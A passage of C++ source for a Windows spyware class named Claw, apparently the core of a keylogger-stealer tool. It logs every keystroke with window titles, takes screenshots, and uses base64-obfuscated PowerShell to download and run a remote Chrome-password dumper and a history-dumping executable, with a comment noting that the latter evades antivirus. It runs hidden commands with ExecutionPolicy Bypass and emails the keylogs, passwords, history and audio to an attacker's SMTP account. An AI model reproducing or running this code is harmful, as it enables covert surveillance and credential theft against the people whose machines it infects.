size_t pos = 0; ; pos += replace.length() ) { 273 | // Locate the substring to replace 274 | pos = s.find( search, pos ); 275 | if( pos == std::string::npos ) break; 276 | // Replace by erasing and inserting 277 | s.erase( pos, search.length() ); 278 | s.insert( pos, replace ); 279 | } 280 | } 281 | 282 | std::string Claw::initial_install_directory(){ 283 | char szPath[MAX_PATH]; 284 | if (SUCCEEDED(SHGetFolderPath(NULL, CSIDL_APPDATA | CSIDL_FLAG_CREATE, NULL, 0, szPath))){ 285 | return std::string(szPath); // return AppData/Roaming Path 286 | } else { 287 | return "C:\\Users\\Public"; // If We are unable to get the AppData/Romaing path, Use Public $HOME folder for installation 288 | } 289 | } 290 | 291 | // Send Email with attachments using Powershell 292 | bool Claw::SendMail(std::string message, std::string subject) 293 | { 294 | STARTUPINFO sinfo; 295 | PROCESS_INFORMATION pinfo; 296 | memset(&sinfo, 0, sizeof(sinfo)); 297 | std::ofstream outscript; 298 | std::string powershell_script = "JFVzZXJuYW1lID0gImRlc3RpbmF0aW9uIjsKJFBhc3N3b3JkID0gImRwYXNzIjsKJGtsb2cgPSAia2xvZ2ZpbGUiOwokc2NyID0gInNjZmlsZSI7CiRzY3JzID0gInNjdHdvIjsKJGhpc3RvcnkgPSAiaGlzdG9yeWZpbGUiOwokcHdzID0gInB3ZmlsZSI7CiRpbmZpbGVzID0gImludGVsIjsKJG1pYyA9ICJhdWRpb2ZpbGVuYW1lIjsKCmZ1bmN0aW9uIFNlbmQtVG9FbWFpbChbc3RyaW5nXSRlbWFpbCl7CgogICAgJG1lc3NhZ2UgPSBuZXctb2JqZWN0IE5ldC5NYWlsLk1haWxNZXNzYWdlOwogICAgJG1lc3NhZ2UuRnJvbSA9ICJkZXN0aW5hdGlvbiI7CiAgICAkbWVzc2FnZS5Uby5BZGQoJGVtYWlsKTsKICAgICRtZXNzYWdlLlN1YmplY3QgPSAiZW1haWx0aXRsZSI7CiAgICAkbWVzc2FnZS5Cb2R5ID0gImVtYWlsbWVzc2FnZSI7CiAgICAkYXR0X29uZSA9IE5ldy1PYmplY3QgTmV0Lk1haWwuQXR0YWNobWVudCgka2xvZyk7CiAgICAkYXR0X3R3byA9IE5ldy1PYmplY3QgTmV0Lk1haWwuQXR0YWNobWVudCgkc2NyKTsKICAgICRhdHRfdGhyZWUgPSBOZXctT2JqZWN0IE5ldC5NYWlsLkF0dGFjaG1lbnQoJGhpc3RvcnkpOwogICAgJGF0dF9mb3VyID0gTmV3LU9iamVjdCBOZXQuTWFpbC5BdHRhY2htZW50KCRwd3MpOwogICAgJGF0dF9maXZlID0gTmV3LU9iamVjdCBOZXQuTWFpbC5BdHRhY2htZW50KCRzY3JzKTsKICAgICRhdHRfc2l4ID0gTmV3LU9iamVjdCBOZXQuTWFpbC5BdHRhY2htZW50KCRpbmZpbGVzKTsKICAgICRhdHRfc2V2ZW4gPSBOZXctT2JqZWN0IE5ldC5NYWlsLkF0dGFjaG1lbnQoJG1pYyk7CiAgICAkbWVzc2FnZS5BdHRhY2htZW50cy5BZGQoJGF0dF9vbmUpOwogICAgJG1lc3NhZ2UuQXR0YWNobWVudHMuQWRkKCRhdHRfdHdvKTsKICAgICRtZXNzYWdlLkF0dGFjaG1lbnRzLkFkZCgkYXR0X3RocmVlKTsKICAgICRtZXNzYWdlLkF0dGFjaG1lbnRzLkFkZCgkYXR0X2ZvdXIpOwogICAgJG1lc3NhZ2UuQXR0YWNobWVudHMuQWRkKCRhdHRfZml2ZSk7CiAgICAkbWVzc2FnZS5BdHRhY2htZW50cy5BZGQoJGF0dF9zaXgpOwogICAgJG1lc3NhZ2UuQXR0YWNobWVudHMuQWRkKCRhdHRfc2V2ZW4pOwogICAgJHNtdHAgPSBuZXctb2JqZWN0IE5ldC5NYWlsLlNtdHBDbGllbnQoInNlcnZlcmhvc3QiLCAiNTg3Iik7CiAgICAkc210cC5FbmFibGVTU0wgPSAkdHJ1ZTsKICAgICRzbXRwLkNyZWRlbnRpYWxzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0Lk5ldHdvcmtDcmVkZW50aWFsKCRVc2VybmFtZSwgJFBhc3N3b3JkKTsKICAgICRzbXRwLnNlbmQoJG1lc3NhZ2UpOwogICAgJGF0dF9vbmUuZGlzcG9zZSgpOwogICAgJGF0dF90d28uZGlzcG9zZSgpOwogICAgJGF0dF90aHJlZS5kaXNwb3NlKCk7CiAgICAkYXR0X2ZvdXIuZGlzcG9zZSgpOwogICAgJGF0dF9maXZlLmRpc3Bvc2UoKTsKICAgICRhdHRfc2l4LmRpc3Bvc2UoKQogICAgJGF0dF9zZXZlbi5kaXNwb3NlKCk7CiB9ClNlbmQtVG9FbWFpbCAgLWVtYWlsICJkZXN0aW5hdGlvbiI7Cg=="; 299 | std::string pwdecode = base64_decode(powershell_script); 300 | replaceAll(pwdecode, "destination", DELIVERY_USER); 301 | replaceAll(pwdecode, "dpass", DELIVERY_PASS); 302 | replaceAll(pwdecode, "emailmessage", message); 303 | replaceAll(pwdecode, "emailtitle", subject); 304 | replaceAll(pwdecode, "klogfile", KeylogFileName()); 305 | replaceAll(pwdecode, "scfile", SCREENSHOTFILENAME); 306 | replaceAll(pwdecode, "sctwo", SECONDSCREENSHOT); 307 | replaceAll(pwdecode, "historyfile", "history.txt"); 308 | replaceAll(pwdecode, "pwfile", "chrome.txt"); 309 | replaceAll(pwdecode, "infiles", "intel"); 310 | replaceAll(pwdecode, "audiofilename", MICFILENAME); 311 | if(DELIVERY_USER.find("gmail.com") != std::string::npos){ 312 | replaceAll(pwdecode, "serverhost", "smtp.gmail.com"); 313 | } else if(DELIVERY_USER.find("yahoo.com") != std::string::npos){ 314 | replaceAll(pwdecode, "serverhost", "smtp.mail.yahoo.com"); 315 | } else if(DELIVERY_USER.find("yandex.com") != std::string::npos){ 316 | replaceAll(pwdecode, "serverhost", "smtp.yandex.com"); 317 | } else if (DELIVERY_USER.find("outlook.com") != std::string::npos) 318 | { 319 | replaceAll(pwdecode, "serverhost", "smtp.outlook.com"); 320 | } else if (DELIVERY_USER.find("hotmail.com") != std::string::npos){ 321 | replaceAll(pwdecode, "serverhost", "smtp.outlook.com"); 322 | } 323 | outscript.open("rand.ps1"); 324 | if(outscript.is_open()) 325 | { 326 | outscript << pwdecode; 327 | outscript.close(); 328 | } 329 | CreateProcess(NULL, (LPSTR)"cmd.exe /c powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -file rand.ps1", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo); 330 | WaitForSingleObject(pinfo.hProcess, INFINITE); 331 | CloseHandle(pinfo.hProcess); 332 | CloseHandle(pinfo.hThread); 333 | } 334 | 335 | void Claw::split(char* src, char* dest[5], const char* delimeter) { 336 | int i = 0; 337 | char *p = strtok(src, delimeter); 338 | while (p != NULL) 339 | { 340 | dest[i++] = p; 341 | p = strtok(NULL, delimeter); 342 | } 343 | } 344 | 345 | std::string Claw::MyLocation() 346 | { 347 | TCHAR DIR[MAX_PATH]; 348 | std::string filelocation; 349 | std::ostringstream err; 350 | int fpath = GetModuleFileName(NULL, DIR, MAX_PATH); 351 | if (fpath == 0) 352 | { 353 | err.str(""); err.clear(); 354 | err << "Failed to get : " << GetLastError(); 355 | filelocation = err.str(); 356 | } 357 | else { 358 | filelocation = DIR; 359 | } 360 | 361 | return filelocation; 362 | 363 | } 364 | 365 | std::istream& Claw::ignoreline(std::ifstream& in, std::ifstream::pos_type& pos) 366 | { 367 | pos = in.tellg(); 368 | return in.ignore(std::numeric_limits::max(), '\n'); 369 | } 370 | 371 | std::string Claw::getLastLine(std::ifstream& in) 372 | { 373 | std::ifstream::pos_type pos = in.tellg(); 374 | 375 | std::ifstream::pos_type lastPos; 376 | while (in >> std::ws && ignoreline(in, lastPos)) 377 | pos = lastPos; 378 | 379 | in.clear(); 380 | in.seekg(pos); 381 | 382 | std::string line; 383 | std::getline(in, line); 384 | return line; 385 | } 386 | 387 | std::string Claw::GetKeyLoggerInformation() 388 | { 389 | char* values[5]; 390 | std::ifstream ME(MyLocation().c_str(), std::ios::binary); 391 | if(ME.is_open()){ 392 | std::string hp = getLastLine(ME); // Get Last line from itself 393 | memset(values, '\0', 5); 394 | split((char*)hp.c_str(), values, "[]"); // Split the last line with [] delimeter 395 | std::string method(values[0]); // The Delivery method will be at index 0 396 | std::string demail(values[1]); // The Email / FTP Server will be at index[1] 397 | std::string dpass(values[2]); // The Password will be at index[2] 398 | std::string installname(values[3]); // The Install name will be at index[3] 399 | std::string strtime(values[4]); // Time Interval at index[4] 400 | std::string mic(values[5]); // Mic Switch at index[5] 401 | // Everything written is base64 encoded so we decode it 402 | 403 | DELIVERY_METHOD = base64_decode(method); 404 | DELIVERY_USER = base64_decode(demail); 405 | // If the Delivery method is ftp 406 | if(DELIVERY_METHOD == "ftp"){ 407 | // Split index[1] with , delimeter 408 | // Lets assume X = index[1] splitted with , delimiter 409 | // The the FTP Server is at X[0] and FTP Username at X[1] 410 | char* vals[5]; 411 | split((char*)DELIVERY_USER.c_str(), vals, ","); 412 | FTP_SERVER = vals[0]; 413 | DELIVERY_USER = vals[1]; 414 | } 415 | 416 | DELIVERY_PASS = base64_decode(dpass); 417 | INSTALL_NAME = base64_decode(installname); 418 | strTimeInterval = base64_decode(strtime); 419 | MIC_OPTION = base64_decode(mic); 420 | 421 | return DELIVERY_METHOD + "[]" + DELIVERY_USER + "[]" + DELIVERY_PASS + "[]" + INSTALL_NAME + "[]" + strTimeInterval + "[]" + MIC_OPTION; // Return the decoded information 422 | } 423 | } 424 | 425 | DWORD Claw::ProcessId(LPCTSTR ProcessName) 426 | { 427 | PROCESSENTRY32 pt; 428 | HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 429 | pt.dwSize = sizeof(PROCESSENTRY32); 430 | if (Process32First(hsnap, &pt)) { 431 | do { 432 | if (!lstrcmpi(pt.szExeFile, ProcessName)) { 433 | CloseHandle(hsnap); 434 | return pt.th32ProcessID; 435 | } 436 | } while (Process32Next(hsnap, &pt)); 437 | } 438 | CloseHandle(hsnap); 439 | return 0; 440 | } 441 | 442 | BOOL Claw::isFile(const char* file) 443 | { 444 | DWORD dwAttrib = GetFileAttributes(file); 445 | 446 | return (dwAttrib != INVALID_FILE_ATTRIBUTES && 447 | !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); 448 | } 449 | 450 | std::string Claw::readFileContents(const char* file){ 451 | std::stringstream stream; 452 | std::ifstream outfile(file); 453 | if(outfile.is_open()){ 454 | stream << outfile.rdbuf(); 455 | return stream.str(); 456 | } else { 457 | stream << file << " not found : " << GetLastError(); 458 | return stream.str(); 459 | } 460 | } 461 | 462 | void Claw::ExecuteCommandPrompt( const char* command ) 463 | { 464 | char cmd[500]; 465 | memset(cmd, '\0', 500); 466 | snprintf(cmd, 500, "cmd.exe /c %s", command); 467 | STARTUPINFO sinfo; 468 | PROCESS_INFORMATION pinfo; 469 | memset(&sinfo, 0, sizeof(sinfo)); 470 | if(CreateProcess(NULL, (LPSTR)cmd, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo)){ 471 | WaitForSingleObject(pinfo.hProcess, INFINITE); 472 | CloseHandle(pinfo.hProcess); 473 | CloseHandle(pinfo.hThread); 474 | } 475 | } 476 | 477 | std::string Claw::ExecuteOutFile(const char* command, const char* output_filename) 478 | { 479 | char cmd[500]; 480 | memset(cmd, '\0', 500); 481 | snprintf(cmd, 500, "cmd.exe /c powershell.exe -command %s > %s", command, output_filename); 482 | STARTUPINFO sinfo; 483 | PROCESS_INFORMATION pinfo; 484 | memset(&sinfo, 0, sizeof(sinfo)); 485 | if(CreateProcess(NULL, (LPSTR)cmd, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo)){ 486 | WaitForSingleObject(pinfo.hProcess, INFINITE); 487 | CloseHandle(pinfo.hProcess); 488 | CloseHandle(pinfo.hThread); 489 | } 490 | return readFileContents(output_filename); 491 | } 492 | 493 | void Claw::ExecuteSilent(const char* command) 494 | { 495 | char cmd[500]; 496 | memset(cmd, '\0', 500); 497 | snprintf(cmd, 500, "cmd.exe /c powershell.exe -command %s", command); 498 | STARTUPINFO sinfo; 499 | PROCESS_INFORMATION pinfo; 500 | memset(&sinfo, 0, sizeof(sinfo)); 501 | CreateProcess(NULL, (LPSTR)cmd, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo); 502 | WaitForSingleObject(pinfo.hProcess, INFINITE); 503 | CloseHandle(pinfo.hProcess); 504 | CloseHandle(pinfo.hThread); 505 | //return readFileContents("output"); 506 | } 507 | 508 | // Dump Google Chrome Credentials using Powershell. 509 | std::string Claw::DumpChromeCredentials() 510 | { 511 | std::ofstream ifError; 512 | std::string Payload = "ImlleCAoaXdyIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9xdWFudHVtY29yZS90ZXN0L21hc3Rlci9vcnBoaWMucHMxKSB8IENvbnZlcnRUby1Dc3Y7Ig=="; 513 | std::string b64decode = base64_decode(Payload); 514 | ExecuteOutFile(b64decode.c_str(), "chrome.txt"); 515 | 516 | if(readFileContents("chrome.txt").find("FullyQualifiedErrorId") != std::string::npos) 517 | { 518 | ifError.open("chrome.txt", std::ofstream::out | std::ofstream::trunc); 519 | if(ifError.is_open()){ 520 | ifError << "Chrome installation not found OR no Passwords saved. (ERROR_PWDUMP)." << std::endl; 521 | ifError.close(); 522 | } 523 | } 524 | 525 | return readFileContents("chrome.txt"); 526 | 527 | } 528 | 529 | // Dump browsing histroy for the last 3 hours using 530 | // Nirsoft History Dumper 531 | // BrowserHistoryView.exe is not detected by Anti Virus. 532 | // The function downloads it, uses it to dump the history, And removes it. 533 | void Claw::DumpBrowserHistory(){ 534 | std::string Payload = "W05ldC5TZXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VjdXJpdHlQcm90b2NvbCA9IFtOZXQuU2VjdXJpdHlQcm90b2NvbFR5cGVdOjpUbHMxMjsgKG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9naXRodWIuY29tL3F1YW50dW1jb3JlL3Rlc3QvcmF3L21hc3Rlci9Ccm93c2luZ0hpc3RvcnlWaWV3LmV4ZScsJ2Jodi5leGUnKTsgIC5cYmh2LmV4ZSAgL1Zpc2l0VGltZUZpbHRlclR5cGUgMiAvVmlzaXRUaW1lRmlsdGVyVmFsdWUgMyAvc3RleHQgaGlzdG9yeS50eHQK"; 535 | std::string b64decode = base64_decode(Payload); 536 | ExecuteSilent(b64decode.c_str()); 537 | while(true){ 538 | Sleep(50); 539 | if(isFile("history.txt")){ 540 | DWORD processid = ProcessId(_T("bhv.exe")); 541 | if(processid == 0){ 542 | // Process id 0, means process is not running. 543 | remove("bhv.exe"); 544 | break; 545 | } 546 | } 547 | } 548 | } 549 | 550 | bool Claw::hookShift(){ 551 | if (GetKeyState(VK_LSHIFT) < -120){return true;} 552 | if (GetKeyState(VK_RSHIFT) < -120){return true;} 553 | return false; 554 | } 555 | 556 | bool Claw::capsLock(){ 557 | if (GetKeyState(VK_CAPITAL) == 1){return true;} 558 | if (GetKeyState(VK_CAPITAL) == -127){return true;} 559 | return false; 560 | } 561 | 562 | 563 | int Claw::filter(int key){ 564 | if ((key >= 65) && (key <= 90)){ 565 | if( (!hookShift()) && (!capsLock()) ){ 566 | key +=32; 567 | } 568 | } 569 | else if ((key >= 48) && (key <= 57)){ 570 | if (hookShift()){ 571 | switch(key) { 572 | case '1' : key = '!'; break; 573 | case '2' : key = '@'; break; 574 | case '3' : key = '#'; break; 575 | case '4' : key = '$'; break; 576 | case '5' : key = '%'; break; 577 | case '6' : key = '^'; break; 578 | case '7' : key = '&'; break; 579 | case '8' : key = '*'; break; 580 | case '9' : key = '('; break; 581 | case '0' : key = ')'; break; 582 | } 583 | } 584 | } 585 | if (hookShift()){ 586 | if (key == 186){key = ':';} 587 | else if (key == 187){key = '+';} 588 | else if (key == 188){key = '<';} 589 | else if (key == 189){key = '_';} 590 | else if (key == 190){key = '>';} 591 | else if (key == 191){key = '?';} 592 | else if (key == 192){key = '~';} 593 | 594 | else if (key == 219){key = '{';} 595 | else if (key == 220){key = '|';} 596 | else if (key == 221){key = '}';} 597 | else if (key == 222){key = '"';} 598 | } 599 | 600 | else { 601 | if (key == 186){key = ';';} 602 | else if (key == 187){key = '=';} 603 | else if (key == 188){key = ',';} 604 | else if (key == 189){key = '-';} 605 | else if (key == 190){key = '.';} 606 | else if (key == 191){key = '/';} 607 | else if (key == 192){key = '~';} 608 | 609 | else if (key == 219){key = '[';} 610 | else if (key == 220){key = '\\';} 611 | else if (key == 221){key = ']';} 612 | else if (key == 222){key = '\'';} 613 | } 614 | 615 | return key; 616 | } 617 | 618 | std::string Claw::KeylogFileName() 619 | { 620 | time_t t = time(0); 621 | struct tm * now = localtime( & t ); 622 | char buffer[100] = {0}; 623 | memset(buffer, '\0', 100); 624 | strftime (buffer,100,"%Y-%m-%d",now); 625 | return std::string(buffer); 626 | } 627 | 628 | std::string Claw::WindowStamp() 629 | { 630 | char title[500]; 631 | char buffer[100] = {0}; 632 | memset(title, '\0', 500); 633 | HWND hwnd = GetForegroundWindow(); 634 | GetWindowText(hwnd, (LPSTR)title ,500); 635 | time_t t = time(0); 636 | struct tm * now = localtime( & t ); 637 | memset(buffer, '\0', 100); 638 | strftime (buffer,100,"%Y-%m-%d-%S",now); 639 | 640 | return "[ " + std::string(title) + " - " + std::string(buffer) + " ] "; 641 | } 642 | 643 | 644 | void Claw::Keylogger() 645 | { 646 | for (unsigned char c = 1; c < 255; c++) { 647 | SHORT rv = GetAsyncKeyState(c); 648 | if (rv & 1) { 649 | std::string out = ""; 650 | if (c == 1) 651 | out = ""; 652 | else if (c == 2) 653 | out = ""; 654 | else if (c == 4) 655 | out = ""; 656 | else if (c == 13) 657 | out = "\n[RETURN] " + WindowStamp() + "\n"; 658 | else if (c == 16 || c == 17 || c == 18) 659 | out = ""; 660 | else if (c == 160 || c == 161) 661 | out = ""; 662 | else if (c == 162 || c == 163) 663 | out = "[STRG]"; 664 | else if (c == 164) 665 | out = "[ALT]"; 666 | else if (c == 165) 667 | out = "[ALT GR]"; 668 | else if (c == 8) 669 | out = "[BACKSPACE]"; 670 | else if (c == 9) 671 | out = "[TAB]"; 672 | else if (c == 27) 673 | out = "[ESC]"; 674 | else if (c == 33) 675 | out = "[PAGE UP]"; 676 | else if (c == 34) 677 | out = "[PAGE DOWN]"; 678 | else if (c == 35) 679 | out = "[HOME]"; 680 | else if (c == 36) 681 | out = "[POS1]"; 682 | else if (c == 37) 683 | out = "[ARROW LEFT]"; 684 | else if (c == 38) 685 | out = "[ARROW UP]"; 686 | else if (c == 39) 687 | out = "[ARROW RIGHT]"; 688 | else if (c == 40) 689 | out = "[ARROW DOWN]"; 690 | else if (c == 45) 691 | out = "[INS]"; 692 | else if (c == 46) 693 | out = "[DEL]"; 694 | else if ((c >= 65 && c <= 90) 695 | || (c >= 48 && c <= 57) 696 | || c == 32) 697 | out = filter(c); 698 | 699 | else if (c == 91 || c == 92) 700 | out = "[WIN]"; 701 | else if (c >= 96 && c <= 105) 702 | out = "[NUM " + std::to_string(c - 96) + "]"; 703 | else if (c == 106) 704 | out = "[NUM /]"; 705 | else if (c == 107) 706 | out = "[NUM +]"; 707 | else if (c == 109) 708 | out = "[NUM -]"; 709 | else if (c == 110) 710 | out = "[NUM ,]"; 711 | else if (c >= 112 && c <= 123) 712 | out = "[F" + std::to_string(c - 111) + "]"; 713 | else if (c == 144) 714 | out = "[NUM]"; 715 | else if (c == 192) 716 | out = filter(c); 717 | else if (c == 222) 718 | out = filter(c); 719 | else if (c == 186) 720 | out = filter(c); 721 | else if (c == 187) 722 | out = filter(c); 723 | else if (c == 188) 724 | out = filter(c); 725 | else if (c == 189) 726 | out = filter(c); 727 | else if (c == 190) 728 | out = filter(c); 729 | else if (c == 191) 730 | out = filter(c); 731 | else if (c == 226) 732 | out = filter(c); 733 | 734 | else 735 | out = "[KEY \\" + std::to_string(c) + "]"; 736 | 737 | if (out != "") 738 | { 739 | std::ofstream file; 740 | file.open(KeylogFileName().c_str(), std::ios_base::app); 741 | file << out; 742 | file.close(); 743 | } 744 | } 745 | } 746 | } 747 | 748 | void Claw::ScreenShot(std::string JPEG_FILENAME) 749 | { 750 | ULONG_PTR gdiplustoken; 751 | Gdiplus::GdiplusStartupInput gdistartupinput; 752 | Gdiplus::GdiplusStartupOutput gdistartupoutput; 753 | 754 | gdistartupinput.SuppressBackgroundThread = true; 755 | GdiplusStartup(& gdiplustoken,& gdistartupinput,& gdistartupoutput); 756 | 757 | HDC dc=GetDC(GetDesktopWindow()); 758 | HDC dc2 = CreateCompatibleDC(dc); 759 | 760 | RECT rc0kno; 761 | 762 | GetClientRect(GetDesktopWindow(),&rc0kno); 763 | int w = rc0kno.right-rc0kno.left; 764 | int h = rc0kno.bottom-rc0kno.top; 765 | 766 | HBITMAP hbitmap = CreateCompatibleBitmap(dc,w,h); 767 | HBITMAP holdbitmap = (HBITMAP) SelectObject(dc2,hbitmap); 768 | 769 | BitBlt(dc2, 0, 0, w, h, dc, 0, 0, SRCCOPY); 770 | Gdiplus::Bitmap* bm= new Gdiplus::Bitmap(hbitmap,NULL); 771 | 772 | UINT num; 773 | UINT size; 774 | 775 | Gdiplus::ImageCodecInfo *imagecodecinfo; 776 | Gdiplus::GetImageEncodersSize(&num,&size); 777 | 778 | imagecodecinfo = (Gdiplus::ImageCodecInfo*)(malloc(size)); 779 | Gdiplus::GetImageEncoders (num,size,imagecodecinfo); 780 | 781 | CLSID clsidEncoder; 782 | 783 | for(int i=0; i < num; i++) 784 | { 785 | if(wcscmp(imagecodecinfo[i].MimeType,L"image/jpeg")==0) 786 | clsidEncoder = imagecodecinfo[i].Clsid; 787 | 788 | } 789 | 790 | free(imagecodecinfo); 791 | 792 | std::wstring ws; 793 | ws.assign(JPEG_FILENAME.begin(),JPEG_FILENAME.end()); 794 | bm->Save(ws.c_str(),& clsidEncoder, NULL); 795 | SelectObject(dc2,holdbitmap); 796 | DeleteObject(dc2); 797 | DeleteObject(hbitmap); 798 | 799 | ReleaseDC(GetDesktopWindow(),dc); 800 | Gdiplus::GdiplusShutdown(gdiplustoken); 801 | } --------------------------------------------------------------------------------